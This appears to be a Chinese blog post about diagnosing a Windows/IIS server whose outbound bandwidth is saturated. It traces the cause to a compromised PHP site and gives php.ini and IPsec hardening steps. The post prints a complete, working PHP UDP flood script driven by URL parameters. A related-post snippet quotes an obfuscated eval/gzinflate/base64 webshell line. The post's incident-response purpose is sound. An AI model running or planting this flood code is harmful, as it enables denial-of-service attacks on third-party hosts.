php判断网络满载,服务器流出带宽满载,网络堵塞

于 2021-04-03 17:37:37 发布
阅读量294 收藏
点赞数
文章标签: php判断网络满载

服务器症状:服务器带宽应用占到70-100%,网络堵塞,网站无法访问,远程控制也连接不上

症状分析:

服务器安装了流量查看软件DU Meter,可以看到,发送的字节增长速度很快(几乎10m/s),收到的字节很少!

在cmd 里用 netstat -an 查看到服务器连接的都是同一个ip ,端口都是连续的。根据这个可以判定不是DDOS攻击,因为DDOS是不断收到大量数据包。

IIS限制了网站带宽,但没有效果。

关闭iis,带宽过一会就正常, 可以判定是网站导致的!然后一个个网站排查(从来没有见过这样的情况,通过页面调用往外发包的)

排查方法:

怀疑是php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:

$packets = 0;

$ip = $_GET[\'ip\'];

$rand = $_GET[\'port\'];

set_time_limit(0);

ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();

print \"Flooded: $ip on port $rand

\";

$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){

$out .= \"X\";

}

while(1){

$packets++;

if(time() > $max_time){

break;

}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";

?>

工作原理:

通过url传递IP和端口以udp的方式打开.传递文件到服务器写出。

解决方法:

在php.ini里设置:

disable_functions =gzinflate;

allow_url_fopen = Off

并且:

;extension=php_sockets.dll

然后重启IIS

如果设置了问题还没有解决,可以尝试把udp端口关闭!

注意:本ip策略包 会关闭所有udp端口,请慎用!

方法1:直接运行包里的 udp.bat

方法2:”开始”菜单—“运行”—输入”gpedit.msc”—“计算机配置”—“windows 设置”—-“安全设置”—右击”ip 安全策略”—“所有任务”—“导入策略”—选择包里的”udp.ipsec”文件

无关联文章.

Ms.Piu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php实现计算网络带宽
02-14
小代码,php实现计算网络带宽,通过计算下载一个文件来算
php 获取带宽,php使用网络攻击占用超大带宽的,解决方案[转]
weixin_39706127的博客
03-24 537
未测试关于近期一些服务器遭受UDP攻击的说明近来我有一两台服务器显示经常受到udp攻击导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的下面我想说一下被入侵的原理用户程序中的一个php页面的原代码:< ?php/*gl*/eval(gzinflate(base64_decode(\...
php服务器 负载,PHP服务器负载判断
weixin_31626765的博客
03-11 185
header("content-type:text/html;charset=utf-8");// echo PHP_OS;exit;// echo get_server_load();var_dump(sys_getloadavg());/*$load = sys_getloadavg();if ($load[0] > 80) {header(‘HTTP/1.1 503 Too busy,...
获得服务器的cpu带宽硬盘等信息php,获取linux服务器性能CPU、内存、硬盘等使用率 PHP...
weixin_39900531的博客
03-26 417
数据库配置文件: conn.phpdefine("MONITORED_IP", "172.16.0.191"); //被监控的服务器IP地址 也就是本机地址define("DB_SERVER", "172.16.7.2"); //存放数据的服务器IP地址define("DB_USER", "root");define("DB_PWD","111111");define("DB_NM...
解决PHP因大量用户使用数据库造成数据库拥堵的几个方法
zxh543362234的博客
06-27 990
一.使用 PHP 直接在共享内存中存储数据集 <?php //数据库连接部分 include("connection.php"); $sql="select * from message"; $result=mysql_query($sql); $row=mysql_fetch_array($result); //共享内存块设置 $systemid = 865; $mode =
基于改进神经网络的非满载车辆路线优化模型.pdf
09-27
基于改进神经网络的非满载车辆路线优化模型是物流运输领域中解决车辆调度问题的一种创新方法。传统的简单神经网络模型在处理非满载车辆调度时,往往导致运输成本的浪费,效率低下。为了克服这一问题,研究者提出了一...
电梯空载、满载、超载运行试验记录.doc
04-26
电梯的运行试验是确保电梯安全、高效运行的重要环节,其中包括空载、满载以及超载运行试验。这些试验旨在验证电梯在不同载荷条件下的性能,以满足国家和行业的相关标准,确保乘客的安全和舒适。以下是对电梯空载、...
参考资料-网络机柜规范.zip
02-24
网络机柜是IT基础设施的重要组成部分,它用于集中安装和管理各种网络设备,如服务器、交换机、路由器、配线架等。本参考资料主要探讨的是网络机柜的规范,旨在提供一个详细、全面的理解,帮助读者在规划、设计和实施...
谷歌:神经网络人声分离技术取得突破.pdf
09-26
谷歌神经网络人声分离技术取得突破 谷歌最近在神经网络人声分离技术方面取得了突破性的进展。研究人员训练了两个独立的神经网络,分别是说话者识别网络和声谱掩码网络。这两个网络一起显著降低了多说话者信号的语音...
弹仓的RBF神经网络自适应滑模控制.pdf
09-25
在弹仓空载、半载和满载三种不同情况下进行仿真验证,结果表明,该控制算法对弹仓系统中存在的非线性摩擦力矩、啮合冲击力矩、链传动多边形效应以及其他未知的外部扰动力矩等不敏感,具有较好的鲁棒性,控制精度较高...
php 查看cpu占用率_php-fpm CPU占用率过高的排查方法
weixin_36149595的博客
03-08 1294
一,开启日志记录,为以后排查做准备1.1 开启php-fpm.conf的错误日志和慢执行日志和常规日志, 采样一个小时,就可以根据这些日志的内容进行分析问题error_log = /tmp/error.log //错误日志access.log = /tmp/access.$pool.log //常规日志,记录每次访问时间,记录不同参数,以防止恶意攻击,后面会详细解析access.format = ...
*【封装php函数】获取linux服务器centos硬件的一些信息,获取cpu、内存、硬盘、网络带宽的使用率和单位转换
西瓜的博客
05-14 962
注意:以下代码都是放在服务器上访问,才会有结果的 /** * 获取CPU使用率 */ function getCPURate($speed = 0.5) { if (false === ($prevVal = @file("/proc/stat"))) { //把整个文件读入到数组中 return false; } $prev...
HBase解决Region Server Compact过程占用大量网络出口带宽的问题
轻轻草原
12-17 394
HBase 0.92版本之后,Region Server的Compact过程根据待合并的文件大小分为small compaction和large compaction两种,由此可能导致在集群写入量大的时候Compact占用过多的网络出口带宽。本文将详细描述集群使用过程中遇到这一问题的排查过程及其解决方法。 1. 发现问题 HBase集群(版本为0.94.0)运行过程中,发现5台Region...
Linux 服务器带宽跑满检测
xxiyj的专栏
06-07 554
1、服务器内部安装 iftop 流量监控工具: yum install iftop -y         2、.服务器外网带宽被占满时,如果通过远程无法登陆,可通过阿里云终端管理进入到服务器内部,运行下面命令查看流量占用情况:   iftop -i eth1 -P       ...
php获取实时带宽,Golang 获取网卡时时带宽,可用于测速
weixin_34338504的博客
03-17 461
每秒计算一次网卡出口带宽,并保存到指定文件,用于其他程序,如:php、shell读取带宽那么如果是shell ,为啥不写在shell里面呢?答案是可以的,只是场景不一样,这里用go实现读取一次,然后其他程序可以多任务执行,直接使用结果。package mainimport ("bytes""fmt""io/ioutil""os""os/exec""strings""time")func main(...
php 处理阻塞,PHP编程中的Session阻塞问题与解决方法分析
weixin_42527654的博客
03-11 83
本文实例讲述了PHP编程中的Session阻塞问题与解决方法。分享给大家供大家参考,具体如下:使用session过程中,在开启session后,同一浏览器,执行同一程序,不同页面会被锁。不同浏览器不会出现这种情况。疑问:是不是session_start导致了阻塞?于是,我写了几个页面测试了一下,发现是session导致了阻塞,而其他两种情况不会造成阻塞。查了下PHP的Bug列表,发现有人提出了这个...
PHP 获取linux服务器性能CPU、内存、硬盘、进程等使用率
bahuzhen6750的博客
06-05 1390
数据库配置文件: conn.php <?php define("MONITORED_IP", "172.16.0.191"); //被监控的服务器IP地址 也就是本机地址 define("DB_SERVER", "172.16.7.2"); //存放数据的服务器IP地址 define("DB_USER", "root"); define("DB_PWD",...
php获取当前网速,关于网络,带宽,网速,延迟的一些知识
weixin_36418921的博客
03-11 570
在空间老是听到什么10m带宽玩不了游戏,除了电信都玩不了游戏各种误解,我也是很无奈.关于家用网络,有3个本身值和,3个外部值一个条件决定了网络;1:下行带宽,俗称下载速度,一般单位是mbps,8mbps=1m/s,也就是说,大家拉的10m网线,下载速度最快是1.25m/s,这个速度有多快呢?这样说,下载一首歌只需要3-10秒中,而对于游戏,就拿lol说,100kb/s就可以带动了,所以,只要超过了...
php 监控带宽,带宽监控, 带宽报告, NetFlow Analyzer
weixin_39545102的博客
03-16 156
厂商支持的Flows设备列表CiscoTraditional NetFlow(NetFlow v5)ASR 1000, Cisco ISR G1 and ISR G2 models (800, 1800, 1900, 2800, 2900, 3800, 3900), 1700, 3660, Catalyst 4500, Catalyst 6500 with Sup 32 and Sup 720, ...
《自顶向下方法》-笔记.docx
07-28
丢包可能发生在路由器缓存满载时,而吞吐量表示网络在单位时间内能传输的数据量。理解这些指标对于优化网络性能至关重要。 总结,《自顶向下方法》笔记通过实例和详细解释,帮助读者掌握计算机网络的基础知识,理解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值